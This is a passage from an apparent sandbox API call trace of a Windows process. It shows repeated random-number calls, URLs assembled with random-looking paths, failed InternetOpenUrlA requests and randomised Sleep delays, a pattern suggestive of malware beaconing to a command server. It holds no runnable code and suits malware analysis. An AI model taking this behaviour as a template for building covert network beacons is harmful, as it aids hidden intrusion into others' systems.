pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.534] GetProcessHeap () returned 0x440000 [0258.534] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0258.534] lstrcpyA (in: lpString1=0x473b90, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0258.534] lstrcatA (in: lpString1="\x81\x03", lpString2="/Zh2OwlShc4zlj6ca3m7jH2jnwbBehBnzx8wb14zn3t46seft/" | out: lpString1="\x81\x03/Zh2OwlShc4zlj6ca3m7jH2jnwbBehBnzx8wb14zn3t46seft/") returned="\x81\x03/Zh2OwlShc4zlj6ca3m7jH2jnwbBehBnzx8wb14zn3t46seft/" [0258.534] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0258.534] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/Zh2OwlShc4zlj6ca3m7jH2jnwbBehBnzx8wb14zn3t46seft/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0258.534] GetProcessHeap () returned 0x440000 [0258.534] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0258.534] GetProcessHeap () returned 0x440000 [0258.534] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5970 | out: hHeap=0x440000) returned 1 [0258.534] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0258.535] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0258.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0258.535] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0258.535] Sleep (dwMilliseconds=0x192df) [0258.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0258.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.722] GetProcessHeap () returned 0x440000 [0258.722] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0258.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0258.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b26e, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a1b26e) returned 0x0 [0258.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.917] GetProcessHeap () returned 0x440000 [0258.918] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0258.918] lstrcpyA (in: lpString1=0x472b10, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0258.918] lstrcatA (in: lpString1="\x04", lpString2="/t4qhZffTs2t44ss85x3vVlYnufGa/kGXmbe2tqd64lmlwmcebaqjqhpvfsGq1Efs3gfo7ogn/" | out: lpString1="\x04/t4qhZffTs2t44ss85x3vVlYnufGa/kGXmbe2tqd64lmlwmcebaqjqhpvfsGq1Efs3gfo7ogn/") returned="\x04/t4qhZffTs2t44ss85x3vVlYnufGa/kGXmbe2tqd64lmlwmcebaqjqhpvfsGq1Efs3gfo7ogn/" [0258.918] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0258.918] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/t4qhZffTs2t44ss85x3vVlYnufGa/kGXmbe2tqd64lmlwmcebaqjqhpvfsGq1Efs3gfo7ogn/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0258.918] GetProcessHeap () returned 0x440000 [0258.918] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0258.918] GetProcessHeap () returned 0x440000 [0258.918] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0258.918] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0258.919] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0258.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0258.920] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0258.920] Sleep (dwMilliseconds=0x10d98) [0259.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0259.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.049] GetProcessHeap () returned 0x440000 [0259.049] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4eb0 [0259.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0259.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4eb1, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x4d4eb1) returned 0x0 [0259.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0259.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 